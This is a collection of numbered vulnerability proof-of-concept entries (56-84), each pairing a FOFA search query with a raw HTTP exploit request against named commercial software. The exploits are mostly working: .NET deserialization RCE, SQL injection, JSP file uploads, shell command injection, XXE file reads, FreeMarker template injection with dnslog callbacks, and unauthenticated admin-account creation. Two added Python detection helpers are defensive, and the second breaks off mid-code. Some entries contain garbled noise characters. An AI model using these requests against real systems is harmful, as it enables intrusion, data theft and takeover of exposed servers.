FOFA:app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c ping 6qevyvmi.dnslog.pw"
      }
    }
  }
}

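Incident-response helper for entries 54 and 56, written for this page (not code from the original post or from Chanjet). Both requests carry the same .NET gadget: AjaxPro deserializes the "__type" hints in the JSON, builds a System.Windows.Data.ObjectDataProvider whose ObjectInstance is a System.Diagnostics.Process, and invokes its Start method with the supplied ProcessStartInfo. The walker below lists every __type that is not one of the application's own, reports whether that exact chain is present, rebuilds the command line and, for the "echo X > file" form used in entry 54, extracts the file name a responder should look for on disk and in the web log (it is the path requested in that entry's step 2). The allowlist prefix "Ufida.T." is an assumption about the application's own type namespace, taken from the endpoint names on the page; the sample bodies are constructed from the entries, with the DNS host kept as a placeholder.

```python
import json
import re

# Assumption: the application's own serializable types live under this namespace;
# any other __type arriving from the client is foreign and should be refused outright.
ALLOWED_TYPE_PREFIXES = ("Ufida.T.",)
_REDIRECT = re.compile(r">\s*(\S+)")

# Constructed samples in the shape of entries 54 and 56 (the DNS host is a placeholder).
SAMPLE_54 = json.dumps({"storeID": {
    "__type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, "
              "Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName": "Start",
    "ObjectInstance": {
        "__type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, "
                  "PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
            "__type": "System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, "
                      "Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "FileName": "cmd",
            "Arguments": "/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"}}}})
SAMPLE_56 = SAMPLE_54.replace(
    "/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt",
    "/c ping 6qevyvmi.dnslog.pw")


def _type_name(value: str) -> str:
    """'Ns.Type, Assembly, Version=...' -> 'Ns.Type'."""
    return value.split(",", 1)[0].strip()


def _walk(node, types: list[str], start_infos: list[dict], providers: list[dict]) -> None:
    """Depth-first collection of every __type, plus the nodes the gadget is built from."""
    if isinstance(node, dict):
        t = node.get("__type")
        if isinstance(t, str):
            name = _type_name(t)
            types.append(name)
            if name == "System.Diagnostics.ProcessStartInfo":
                start_infos.append(node)
            if name == "System.Windows.Data.ObjectDataProvider":
                providers.append(node)
        for v in node.values():
            _walk(v, types, start_infos, providers)
    elif isinstance(node, list):
        for v in node:
            _walk(v, types, start_infos, providers)


def analyze_ajaxpro(body: str) -> dict:
    """Foreign __type names, whether the ObjectDataProvider -> Process.Start chain is
    present, the reconstructed command line and any file written by an output redirect."""
    types: list[str] = []
    start_infos: list[dict] = []
    providers: list[dict] = []
    _walk(json.loads(body), types, start_infos, providers)
    foreign = [t for t in types if not t.startswith(ALLOWED_TYPE_PREFIXES)]
    gadget = any(
        p.get("MethodName") == "Start"
        and isinstance(p.get("ObjectInstance"), dict)
        and _type_name(p["ObjectInstance"].get("__type", "")) == "System.Diagnostics.Process"
        for p in providers)
    command = artifact = None
    if start_infos:
        si = start_infos[0]
        command = " ".join(x for x in (si.get("FileName"), si.get("Arguments")) if x)
        m = _REDIRECT.search(si.get("Arguments", ""))
        if m:
            artifact = m.group(1)
    return {"foreign_types": foreign, "gadget": gadget, "command": command, "artifact": artifact}


if __name__ == "__main__":
    print(analyze_ajaxpro(SAMPLE_54))
    print(analyze_ajaxpro(SAMPLE_56))
```

For triage, the "gadget" flag confirms the request is an exploit rather than a probe, "command" goes into the timeline, and "artifact" is the filename to grep for in IIS logs (entry 54 fetches it under /tplus/) and to check on the web root. For prevention, the "foreign_types" list is the policy: a request whose __type values fall outside the application's own namespace has no business being deserialized at all.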
57. Chanjet T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. Chanjet T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA:title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. 百卓 (Byzoro) Smart management platform importexport.php SQL injection
FOFA: title="Smart管理平台"
The sql parameter is base64: c2VsZWN0IDEsdXNlcigpLDM= decodes to `select 1,user(),3`, which the exportexcelbysql action executes directly and exports.
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. 浙大恩特 customer resource management system fileupload.jsp arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
The filename query parameter sets the stored name and extension; the raw request body becomes the file content.
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA: "IP-guard" && icon_hash="2030860561"
The page parameter of the FlexPaper view.php helper is passed to a shell; `||echo ... > file` writes a marker file next to the script.
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the file the injected command wrote:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
Affected: IP-guard < 4.82.0609.0
FOFA: icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

The path value is used relative to the download directory; ..%2Fconfig.ini (../config.ini) retrieves the configuration file one level up.

64. 捷诚 management information system CWSFinanceCommon.asmx SQL injection
FOFA: body="/Scripts/EnjoyMsg.js"
Time-based check: the sId value reaches SQL Server unparameterised, so the injected WAITFOR DELAY makes a vulnerable target answer the SOAP call about five seconds late.
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. 优卡特 脸爱云 one-face-pass smart management platform 1.0.55.0.0.1 authorization bypass
FOFA: title="欢迎使用脸爱云 一脸通智慧管理平台"
SystemMng.ashx accepts the addOperators function without a session. An HTTP 200 response means the account test123456 / 123456 was created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 180

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

The UNION selects the MD5 of 102103122 into the first column. If the response (the original points at lines 42-43 of the returned page) contains the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. Wanhu ezOFFICE wpsservlet arbitrary file upload
FOFA: app="万户网络-ezOFFICE"
newdocId and the multipart filename set the name of the written file, dir sets the directory it is written to (relative to the servlet's save path, so ../ escapes it), and fileType sets the extension.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The uploaded file is then reachable at /defaultroot/platform/portal/layout/apoxkq.jsp and prints sasdfghjkj.
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
The ;.js path-parameter suffix makes the URL look like a static .js resource to the authentication filter while Tomcat strips the path parameter and still dispatches to wf_printnum.jsp. Time-based check: a vulnerable target answers about five seconds late.
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: {{host}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

69. Wanhu ezOFFICE contract_gd.jsp SQL injection
FOFA: app="万户ezOFFICE协同管理平台"
Same ;.js filter bypass as entry 68; here the injectable parameter is gd_startUserCode (time-based, about five seconds of delay).
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. Wanhu ezEIP success.aspx command execution
FOFA: app="万户网络-ezEIP"
The SID header is base64: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk= decodes to `type C:\Windows\win.ini`, the command that is executed. The __VIEWSTATE value is elided as PAYLOAD.
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
FOFA: body="PM2项目管理系统BS版增强工具.zip"
Time-based check on the accId parameter: a vulnerable target answers about five seconds late.
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. Seeyon OA (致远OA) getAjaxDataServlet XXE
FOFA: app="致远互联-OA"
Decoded, xmlValue carries a DOCTYPE that declares the external entity xxe as file:///c:/windows/win.ini and references &xxe; in the VALUE field, so the file content comes back in the response.
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%5D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms远程代码执行* b; F! w9 ^: L& A! B
FOFA:icon_hash=”97540678”
" w8 z( n2 D+ d% E# RPOST /geoserver/wms HTTP/1.1
! q, p6 U+ z2 I5 W1 oHost:
1 B$ j; Z, U M5 F! v1 MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
9 T& c6 D9 U$ P r- k( h$ Z7 KContent-Length: 1981
/ ?* A/ }, o; d- X% A9 [Accept-Encoding: gzip, deflate
, C0 @. i2 U- _% HConnection: close
9 A$ {% K, m2 fContent-Type: application/xml
! J' B o+ x+ S9 V I3 M! f; oSL-CE-SUID: 3
/ k* A" w1 ^0 O4 r, v" |: k
4 G1 r/ i& R6 f3 x% RPAYLOAD) w6 h3 n) O' S- U* E% D( }- B# M
% m; A; S1 Z# ~: M8 J5 ~( e1 k4 p
74. Seeyon (致远) M3-server 6_1sp1 deserialization RCE
FOFA: title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA: app="TELESQUARE-TLR-2005KSH"
The time value of setSyncTimeHost is passed to a shell; the backticks run ifconfig and write its output next to the CGI.
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then fetch the command output:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普 (Newcapec) campus service management platform service.action remote command execution
FOFA: title="掌上校园服务管理平台"
The UnitCode field is rendered through FreeMarker; `?new()` on freemarker.template.utility.Execute turns the template into a command runner.
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
 "command": "GetFZinfo",
 "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

Then fetch the file the command wrote:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

77. F22 garment management software UploadHandler.ashx arbitrary file upload
FOFA: body="F22WEB登陆"
The folder field selects the target directory and the .aspx extension of Filedata is kept as-is.
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs construction quality supervision system FileUpload.ashx file upload
FOFA: icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

Then fetch the uploaded file (the target field chose the web-reachable directory):

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE (百为) traffic-control router remote command execution
FOFA: BYTEVALUE 智能流控路由器
The path value is passed to a shell; `|id` runs id and its output is returned.
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传& p4 @# }5 r- P" p6 u+ o" C( P# n) n
FOFA:app="速达软件-公司产品"7 g2 {- Z {- Z" w9 W
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
. I1 [0 ~3 o8 M: C' HHost: x.x.x.x9 C& U, j6 [" q, t8 S
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15$ O4 p! E3 X |4 i
Content-Length: 27! \) `$ A% U/ r. u+ v
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
1 W; Y& \' R" }% E7 ~Accept-Encoding: gzip, deflate
; P$ A& a( T1 |( R) v" B' wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2, T9 y( |- V* }& C/ b7 c
Connection: close
* n! o0 j5 [- ^5 lContent-Type: application/octet-stream! w8 t- Q4 x0 T
Upgrade-Insecure-Requests: 1$ w: K* B) m( z8 [" F2 U% ?2 C
' D" O. ]/ G/ s/ Z<% out.print("oessqeonylzaf");%>
h5 P( e! x g7 U# K5 B! o
n+ K3 Y- \, S% s6 ]" \
+ s5 c) a! R/ I3 K0 R" eGET /xykqmfxpoas.jsp HTTP/1.15 Z; {% ?" j. p# ? J5 P) a( ^( j+ Z7 P
Host: x.x.x.x
: E0 ]. ]1 B: W0 h0 M5 b, lUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.151 W* h4 W t7 f- K
Connection: close5 x# p' i7 C; p; j* r" z' b$ d
Accept-Encoding: gzip
2 w$ w; x: ~" H' N) B6 _8 _! ]7 `1 h7 V6 ^9 r+ a# q
$ [+ m; L9 ^ \ r; u
81. Uniview (宇视科技) video surveillance main-cgi password disclosure
FOFA: app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
FOFA: app="思福迪-LOGBASE"
The z2 value is interpolated into a shell command; `"|id;"` closes the quoted argument and runs id.
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA: title=="JeecgBoot 企业级低代码平台"
The Cmd header carries the command to execute; the JSON body is elided as PAYLOAD.
POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA: title=="JeecgBoot 企业级低代码平台"
The sql field is rendered as a FreeMarker template before it is used, so `?new()` on freemarker.template.utility.Execute gives command execution. Note that Execute runs the command through Runtime.exec rather than a shell, so the backtick in the URL below is passed literally: the DNS callback proves execution but does not carry the whoami output.

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
 "sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
 "type": "0"
}

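Entries 56 through 84 reuse a small number of request shapes: time-based and error-based SQL injection, base64-wrapped SQL or commands, directory traversal, XXE, FreeMarker `?new()` abuse, shell metacharacters, and .NET gadget type names. The Python below is an added example, not code from the original article or from any vendor listed here; it turns those shapes into detection rules and runs them over recorded requests, decoding URL encoding and the base64 carriers first so that the rules see what the backend sees. RULES, analyze, decode_b64_carriers and SAMPLES are this example's own names, and the samples are abridged copies of requests shown above with dummy hosts.

```python
import base64
import binascii
import re
from urllib.parse import unquote_plus

# Rules distilled from the request shapes in entries 56-84. Each regex runs over
# the URL-decoded request line, headers and body, plus the decoded form of any
# base64 carrier (sql= in entry 60, the SID header in entry 70). Names are ours.
RULES = [
    ("sqli_time_based",  re.compile(r"waitfor\s+delay\s+'", re.I)),
    ("sqli_union",       re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
    ("sqli_fingerprint", re.compile(r"@@version|\buser\(\)|hashbytes\s*\(\s*'md5'", re.I)),
    ("path_traversal",   re.compile(r"\.\.(?:/|;/|\\)")),
    ("sensitive_file",   re.compile(r"win\.ini|/etc/passwd|config\.ini", re.I)),
    ("xxe",              re.compile(r"<!ENTITY\b[^>]*\bSYSTEM\b", re.I)),
    ("freemarker_ssti",  re.compile(r"<#assign\b.*?\?new\(\)|freemarker\.template\.utility\.Execute",
                                    re.I | re.S)),
    # shell keyword right after a separator (| ; = backtick newline) or after "cmd /c",
    # a backtick group, or bash's ${IFS} space substitute
    ("cmd_injection",    re.compile(r"(?:[|;=`\n]\s*|cmd\s*/c\s+)(?:id|whoami|cat|echo|ifconfig|ipconfig|curl)\b"
                                    r"|`[^`]*`|\$\{IFS\}", re.I)),
    ("dotnet_gadget",    re.compile(r"System\.Diagnostics\.Process|ObjectDataProvider")),
]

# Where this section hides base64: the sql= query parameter and the SID header.
B64_CARRIER = re.compile(r"(?:[?&]sql=|\bSID:\s*)([A-Za-z0-9+/]{8,}={0,2})")


def decode_b64_carriers(raw):
    """Decode base64 values found in the raw (not yet URL-decoded) request text."""
    decoded = []
    for m in B64_CARRIER.finditer(raw):
        try:
            decoded.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except binascii.Error:
            continue  # looked like base64 but is not; ignore
    return decoded


def analyze(request_line, headers="", body=""):
    """Return the sorted names of the rules that fire on one request."""
    raw = "\n".join((request_line, headers, body))
    text = unquote_plus(raw) + "\n" + "\n".join(decode_b64_carriers(raw))
    return sorted(name for name, rx in RULES if rx.search(text))


# Constructed samples: abridged copies of requests from this section, dummy hosts.
SAMPLES = {
    "benign": ("GET /tplus/UFAQD/keyEdit.aspx?KeyID=12&preload=1 HTTP/1.1", "", ""),
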